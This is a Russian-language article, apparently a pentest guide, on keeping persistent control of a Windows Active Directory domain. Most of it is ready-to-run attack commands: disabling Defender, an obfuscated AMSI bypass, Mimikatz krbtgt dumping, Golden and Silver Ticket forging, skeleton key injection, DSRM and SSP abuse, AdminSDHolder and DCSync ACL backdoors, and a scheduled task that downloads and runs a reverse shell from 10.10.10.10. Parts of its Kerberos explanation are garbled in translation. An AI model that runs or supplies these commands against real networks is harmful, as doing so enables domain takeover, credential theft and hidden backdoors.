Статья Active Directory - Domain Persistence

Active Directory - Domain Persistence​

На протяжении всей статьи я буду использовать Invoke-Mimikatz при сохранении в домене Windows/Active Directory. Если требуются любые другие инструменты, они будут упомянуты в конце.

​

Как работает система kerberos? ​

1. Привилегированный пользователь хочет получить доступ к определенной службе от приложения или сервера с поддержкой Kerberos.
2. Пользователь отправляет метку времени в KDC, которая зашифрована и подписана NTLM хэшем пароля пользователя.
3. Для того чтобы KDC мог проверить, сделан ли запрос от того пользователя, за которого он себя выдает, требуется следующее.

• KDC получает и расшифровывает зашифрованную метку времени.
• KDC проверяет, что запрос поступил от пользователя, за которого он себя выдает, и отвечает билетом Ticket Granting Ticket (TGT), который может выдать другой билет.
• Отправленный TGT шифруется и подписывается НТМL-хэшем KRBTG, который представляет собой особую учетную запись KDC, используемую только для этой цели. Это означает, что TGT может быть прочитан и открыт только KRBTG.

1. Клиент получает TGT, отправляет его обратно в DC и запрашивает услугу Ticket Granting Service (TGS).
2. KDC получает TGS, расшифровывает его и выполняет следующую проверку.
3. Единственное, что он проверяет, это может ли он расшифровать TGT или нет. Если это возможно, он предполагает, что все содержимое внутри TGT действительно. Эта проверка длится до 20 минут для любого запроса TGT, отправленного в KDC.

• Как только TGT расшифровывается, KDC отвечает TGS.
• Примечание: KDC не имеет никакой роли, кроме сертификата привилегированной роли (PRG).
• TGS, отправленный из KDC, зашифрован НТМL хэшем услуги, которую пользователь запросил у приложения или сервера с поддержкой Kerberos. Это означает, что TGT может быть прочитан и открыт только сервером приложения.

• Клиент подключается к серверу приложений и предъявляет TGS, полученный от KDC для запрашиваемой услуги.
• Поскольку TGS зашифрован с помощью НТМL-хэша учетной записи сервиса, он расшифровывает TGS и затем решает, может ли пользователь получить доступ к сервису или нет.

• Клиент получает услугу, которую он запросил у сервера приложений.
• Существует взаимная аутентификация между клиентом и сервером приложений, чтобы легальный клиент не отправил TGS на нелегальный сервер приложений.

• NTLM хэш пароля для шифрования Kerberos RC4.
• Билет на вход (TGT) обеспечивает авторизацию пользователя на DC.
• Политика Kerberos проверяется только при создании TGT.
• DC проверяет учетную запись пользователя, только если TGT > 20 минут.
• Проверка PAC Service Ticket (TGS) является необязательной и редкой. Это проверка валидности между KDC и сервером приложений напрямую.
• Сервер LSASS отправляет запрос на проверку PAC службе нетлогина DC (NRPC).
• Если она работает как служба, проверка PAC необязательна (отключена).
• Если служба работает как System, она выполняет проверку подписи сервера на PAC (долгосрочный ключ учетной записи компьютера).

PsExec64.exe \\adminsys.star.castle.local -u star\adminsys -p passwordhere cmd

1. Отключить Защитника​

Set-MpPreference -DisableRealtimeMonitoring $true

2. Обход AMSI​

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{O}"-F'F', 'rE' ) ) 3; ( GeT-VariaBle ( "1Q2U" + "zX" )  -VaL_s+)."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{@}{5}" -f'Util', 'A', 'Amsi','.Management.', 'utomation.','s', 'System' ))."g`etf`iE1D"( ( "{O}{2}{1}" -f'amsi','d','InitFaile' ),("{2}{4}{O}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )

3. Выполните mimikatz на DC от имени DA, чтобы получить хэш krbtgt​

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computer-name>

4. Создать тикет на любой машине (атака «pass the ticket»)​

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain-name-goes-here /sid:sid-goes-here /krbtgt:hash-goes-here id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

5. Список доступных служб Kerberos​

klist

Дополнительные команды​

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Использование NTML-хэша KRBTGT для создания Golden Ticket​

• Требуются привилегии DA, которые могут быть выполнены с использованием over-pass-the-hash для запуска сеанса PowerShell в качестве администратора домена.
• Введите PSSession в контроллер домена и создайте дамп хэшей.

# Enter session
powershell -ep bypass
$sess = New-PSSession -ComputerName <computer-name>
Enter-PSSession $sess

# Bypass Protections
[star-dc]:PS> Set-MpPreference -DisableRealtimemonitoring $true
[star-dc]:PS> Set-MpPreference -DisableIOAVProtection $true

# exit PSRemote session
exit

# Get the KRBTGT hash
Invoke-Command -FilePath .\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession $sess
[star-dc]:PS> Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
[star-dc]:PS> Invoke-Mimikatz

#Note the admin SID
. .\PowerView.ps1
Get-DomainSID -Administrator

#Load the krbtgt hash
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain-name-here /sid:admin-sid-here /krbtgt:krbtg-hash-here id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

ls \\star-dc\C$\
gwmi -Class win32_computersystem -ComputerName star-dc

​

Silver Ticket​

• Мы будем пользоваться 5-м шагом в системе Kerberos с помощью silver ticket.
• Действительный TGS (Golden Ticket — TGT).
• Зашифровано и подписано хэшем NTLM учетной записи службы (golden tisket подписанный хэшем krbtgt), работающей с этой учетной записью.
• Службы редко проверяют PAC (сертификат привилегированного атрибута).
• Службы разрешат доступ только к самим службам.
• Разумный период сохранения (по умолчанию 30 дней для учетных записей компьютеров).

Методология/шаги​

• 1. Получите сеанс Powershell в качестве «администратора домена», используя «Передача хэша». атаку
• 2. Создайте New-PSSession , прикрепленный к «контроллеру домена»
• 3. Войдите в новый сеанс, используя Enter-PSSession.
• 4. Обойти AMSI
• 5. Выход
• 6. Загрузите Mimikatz.ps1 в новую сессию с помощью команды Invoke
• 7. Войдите в новый сеанс Enter-PSSession снова
• 8. Теперь мы можем выполнить mimikatz на DC
• 9. krbtgt хэш
• 10. Запросить доступ для обслуживания ДЦ с помощью хэша rc4
• 11. Запланируйте и выполните задачу

Invoke-Mimikatz​

1. Выполните mimikatz на DC от имени DA, чтобы получить хэш krbtgt​

  Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

2. Используя хэш учетной записи компьютера контроллера домена, приведенная ниже команда обеспечивает доступ к общим ресурсам на контроллере домена. ​

Invoke-Mimikatz -Command '"kerberos::golden /domain:star-dc /sid:admin-sid-here /target:star-dc /service:CIFS /rc4:rc4-hash-here /user:Administrator /ptt"'

3. Запланируйте и выполните задачу​

schtasks /create /S star-dc /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://10.10.10.10:8080/Invoke-PowerShellTcp.psi''')'"

schtasks /Run /S star-dc /TN "STCheck"

• Skeleton key - это метод сохранения, при котором можно исправить домен. Контроллер (процесс Lsass), чтобы разрешить доступ любому пользователю с единыv паролем.
• Атака была обнаружена компанией Dell Secureworks, которая использовала вредоносное ПО под названием Skeleton Key.
• Все общеизвестные методы НЕ сохраняются после перезагрузки .

Методология/шаги​

Invoke-Mimikatz​

1. Используйте приведенную ниже команду, чтобы ввести скелетный ключ​

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton' -ComputerName <computer-name>

Пароль от skeleton key: mimikatz

2. Теперь мы можем получить доступ к любой машине с действительным именем пользователя и паролем как mimikatz.​

Enter-PSSession -Computername <computer-name> -credential dcorp\Administrator

Дополнительные команды ​

LSASS работает как защищенный процесс​

mimikatz# privilege::debug
 mimikatz# !+
 mimikatz# !processprotect /process:lsass.exe /remove
 mimikazt#  misc::skeleton
 mimikatz# !-

Режим восстановления службы каталогов (DSRM) ​

• DSRM — это режим восстановления службы каталогов.
• На каждом контроллере домена есть локальный администратор, который называется «Администратор», чей пароль является паролем DSRM.
• Пароль DSRM ( SafeModePassword ) требуется, когда сервер повышается до контроллера домена, и его редко меняют.
• После изменения конфигурации на контроллере домена можно передать хэш NTLM этого пользователя для доступа к контроллеру домена.

Методология​

Invoke-Mimikatz​

1. Сброс пароля DSRM (требуются привилегии DA)​

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc

2. Сравните хэш администратора с хешем администратора приведенной ниже команды.​

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

3. Добавьте/измените поведение при входе в систему для учетной записи DSRM.​

#Get a session as the DC
Enter-PSSession -Computername dcorp-dc

#check DSRM property
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"

#If DSRMAdminLognonBehariour attribute not created then create and set
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD -Verbose

#If already present but wrong value , then update
Set-ItemProperty -Name "DsrmAdminLogonBehavior" -Value 2

4. Используйте команду ниже, чтобы передать хэш​

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:dsrm-hash-goes-here /run:powershell.exe"'

5. Теперь мы можем запускать команды на DC​

 ls \\dcorp-dc\c$

Пользовательский поставщик поддержки безопасности (SSP) ​

• NTLM
• Kerberos
• Wdigest
• CredSSP

Mimikatz (Как настроить SSP)​

Способ 1​

$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Ccontrol\Lsa\OSconfig\ -Name 'Security Packages'| select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\control\Lsa\OSconfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\control\Lsa\ -Name 'Security Packages' -Value $packages

Способ 2​

Invoke-Mimikatz -Command '"misc::memssp"'

Теперь вы можете просматривать все локальные журналы logo n с учетными данными в C:\Windows\System32\kiwissp.log

ACL — AdminSDHolder ​

• Распологается в системном контейнере домена и используется для управления разрешениями - с помощью ACL - для некоторых встроенных привилегированных групп (называемых защищенные группы).
• Распространитель дескриптора безопасности (SDPROP) запускается каждый час и сравнивает ACL защищенных групп и члены с ACL AdminSDHolder и любые различия перезаписывается в объектном ACL.

Invoke-SDPropagator​

Запустите SDProp вручную​

Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

Для машин Pre-Server 2008​

Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose

Powerview (ветвь разработки)​

Добавьте разрешения на полный доступ для пользователя в AdminSDHolder​

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName user1 -Rights All -Verbose

Другие интересные разрешения (Reset-password, Write-members) для пользователя в AdminSDHolder​

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName user1 -Rights ResetPassword -Verbose
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName user1 -Rights WriteMembers -Verbose

Проверить права администратора домена​

Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'user1'}

Злоупотребление ResetPassword/ForceChangePassword​

Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

Злоупотребление ForceChangePassword с учетными данными другого пользователя​

Import-Module .\PowerView_dev.ps1

#Setting password for runas user for
$SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force

#Setting password for runas user for
$Cred = New-Object System.Management.Automation.PSCredential('Domain-Name-Here\User-here', $SecPassword)

#Set new password fot the user where you can abuse ForceChangePassword
$UserPassword = ConvertTo-SecureString 'Password1!' -AsPlainText -Force

#Update the password for that user
Set-DomainUserPassword -Identity User-Whose-Password-You-Want-To-Change-here -AccountPassword $UserPassword -Crendential $Cred

Получить общий доступ​

Импортируйте ADModule и установим скрипт SDPropagator PS в папку с тем же путем.​

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName user1 -Rights All -Verbose

$sess = New-PSSession -Computername star-dc.root.local
Invoke-Command -FilePath ".\Invoke-SDPropagator.ps1" -Session $sess
Enter-PSSession -Session $sess

[star-dc.root.local]:PS> Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

Теперь, если мы проверим разрешения пользователя, у него должен быть общий доступ ко всем.​

Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'user1'}

Add-DomainGroupMember -Identity 'Domain Admins' -Members 'user1' -Verbose

ACL-DCSync ​

• Есть еще более интересные ACL, которые можно использовать.
• Вот например, с привилегиями DA список ACL для корня домена может быть изменен, чтобы предоставить полезные права, такие как FullControl или возможность запускать «DCSync».

Методология​

PowerView​

1. Добавьте права для DCSync​

Add-ObjectAcl -TargetDistinguishedName 'DC=domain,DC=local' -PrincipalSamAccountName student1 -Rights DCSync -Verbose

Invoke-Mimikatz ​

2. Выполните DCSync​

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

ACL — дескрипторы безопасности ​

• Можно изменить дескрипторы безопасности (информацию о безопасности, такую как Владелец, основная группа, DACL и SACL) нескольких методов удаленного доступа (защищаемые объекты), чтобы разрешить доступ пользователям без прав администратора.
• Требуются административные привилегии .
• Это, конечно, работает как очень полезный и действенный бэкдор-механизм.
• Безопасность Язык определения дескрипторов определяет формат, который используется для описать дескриптор безопасности. SDDL использует строки ACE для DACL и SACL:

ace_type; ace_flags;rights;object_guid;inherit_object_guid;account_sid

• ACE для встроенных администраторов пространств имен WMI
  Код с оформлением (BB-коды): Скопировать в буфер обмена

  A:Cl;CCDCLCSWRPWPRCWD;;;SID

Методология​

Set-RemoteWMI ​

Set-RemoteWMI -UserName userX -Verbose

2. На удаленной машине для пользователя X без явных учетных данных​

Set-RemoteWMI -UserName userX -ComputerName <computer> -namespace 'root\cimv2' -Verbose

3. Теперь мы можем выполнять WMI команды​

Get-WmiObject -Class win32_operatingsystem -ComputerName <computer>

4. На удаленной машине с явными учетными данными. Только root\cimv2 и вложенные пространства имен​

5. На удаленной машине удалить разрешения​

Set-RemoteWMI -UserName userX -ComputerName <computer> -namespace 'root\cimv2' -Remove -Verbose

Set-RemotePSRemoting​

1. На локальной машине для пользователя X​

Set-RemotePSRemoting -UserName userX -Verbose

2. Теперь мы можем выполнять ScriptBlock через Invoke-Command ​

Invoke-Command -ScriptBlock {whoami} -ComputerName <computer>

3. На удаленной машине для пользователя X без учетных данных​

Set-RemotePSRemoting -UserName userX -ComputerName <computer> -Verbose

4. На удаленной машине удалите разрешения​

Set-RemotePSRemoting -UserName userX -ComputerName <computer> -Remove

Add-RemoteRegBackdoor​

1. Использование DAMP с правами администратора на удаленной машине​

Add-RemoteRegBackdoor -ComputerName <computer> -Trustee user1 -Verbose

RemoteHashRetrieval ​

2. Получить хэш учетной записи компьютера​

 Get-RemoteMachineAccountHash -ComputerName <computer> -Verbose

3 .Получить хеш локальной учетной записи​

Get-RemoteLocalAccountHash -ComputerName <computer> -Verbose

4. Получить кешированные учетные данные домена​

Get-RemoteCachedCredential -ComputerName <computer> -Verbose

Используемые инструменты​

1. Скачать Invoke-Mimikatz отсюда: Invoke-Mimikatz
2. Загрузите PowerView отсюда: powerview.ps1
3. Загрузите PowerView Dev отсюда: powerview.ps1
4. Set-RemoteWMI скачать отсюда: Set-RemoteWMI.ps1
5. Set-RemotePSRemoting скачать отсюда: Set-RemotePSRemoting.ps1
6. Add-RemoteRegBackdoor скачать отсюда: Add-RemoteRegBackdoor.ps1
7. RemoteHashRetrieval скачать отсюда: RemoteHashRetrieval.ps1